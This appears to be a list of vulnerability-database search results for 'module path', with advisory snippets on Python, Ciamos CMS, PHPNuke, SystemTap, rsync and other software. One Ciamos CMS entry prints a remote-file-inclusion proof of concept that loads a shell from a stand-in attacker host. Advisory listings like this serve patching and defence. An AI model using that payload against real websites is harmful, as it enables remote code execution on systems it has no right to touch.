python: Heap overflow in zipimporter module
A vulnerability was discovered in Python, in the built-in zipimporter. A specially crafted zip file placed in a module path such that it would be loaded by a later "import" statement could cause a heap overflow, leading to arbitrary code execution...
Ciamos CMS <= 0.9.5 (module_path) Remote File Inclusion Vulnerability
No description provided by source. Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Ciamos CMS <= 0.9.5 (module_path) Remote File Include Vulnerability Download Script : http://sourceforge.net/projects/ciamosmodules/files/ Dork : dieHacking attempt; :D Vuln : ./ciamos/modules/pms/index.php line 13 ?p...
PHPNuke Splatt Forum 3.2 Module Path Disclosure Vulnerability
No description provided by source. source: http://www.securityfocus.com/bid/7080/info The Splatt Forum module for PHPNuke has been reported prone to a vulnerability which, when exploited, may disclose sensitive path information to a remote attacker. An attacker could use the information gathered ...
Scientific Linux Security Update : systemtap on SL6.x i386/x86_64
SystemTap is an instrumentation system for systems running the Linux kernel. The system allows developers to write scripts to collect data on the operation of the system. It was found that SystemTap did not perform proper module path sanity checking if a user specified a custom path to the uprobe...
DEBIAN-CVE-2011-2502
runtime/staprun/staprun_funcs.c in the systemtap runtime tool (staprun) in SystemTap before 1.6 does not properly validate modules when a module path is specified by a user for user-space probing, which allows local users in the stapusr group to gain privileges via a crafted module in the search pat...
RedHat Update for systemtap RHSA-2011:1088-01
Check for the Version of systemtap OpenVAS Vulnerability Test RedHat Update for systemtap RHSA-2011:1088-01 Authors: System Generated Check Copyright: Copyright (c) 2012 Greenbone Networks GmbH, http://www.greenbone.net This program is free software; you can redistribute it and/or modify it under t...
RHEL 6 : systemtap (RHSA-2011:1088)
Updated systemtap packages that fix two security issues are now available for Red Hat Enterprise Linux 6. The Red Hat Security Response Team has rated this update as having moderate security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are...
Ciamos CMS 0.9.5 Remote File Inclusion
Discovered by cr4wl3r \ cr4wl3r4tlinuxmaildotorg Ciamos CMS PoC : http://server/modules/pms/index.php?modulepath=http://attacker/shell.txt??? 90r0nt4l0 und3r9r0nd c0mmun1ty Gorontalo / 2009...
PT-2007-6140 · Openengine · Openengine
Name of the Vulnerable Software and Affected Versions: openEngine version 1.9 beta1 Description: The issue allows remote attackers to execute arbitrary PHP code via a URL in the this module path parameter in the html/modules/extranet profile/main.php file. However, it is noted that PHP encounters...
WebBuilder 2.0 (StageLoader.php) Remote File Include Vulnerability
Exploit for unknown platform in category web applications. WebBuilder 2.0 StageLoader.php Remote File Include Vulnerability...
Rsync < 2.6.3 Sanitize_path Function Module Path Escaping
Binary data 1965.prm...
DEBIAN-CVE-2004-0426
rsync before 2.6.1 does not properly sanitize paths when running a read/write daemon without using chroot, which allows remote attackers to write files outside of the module's path...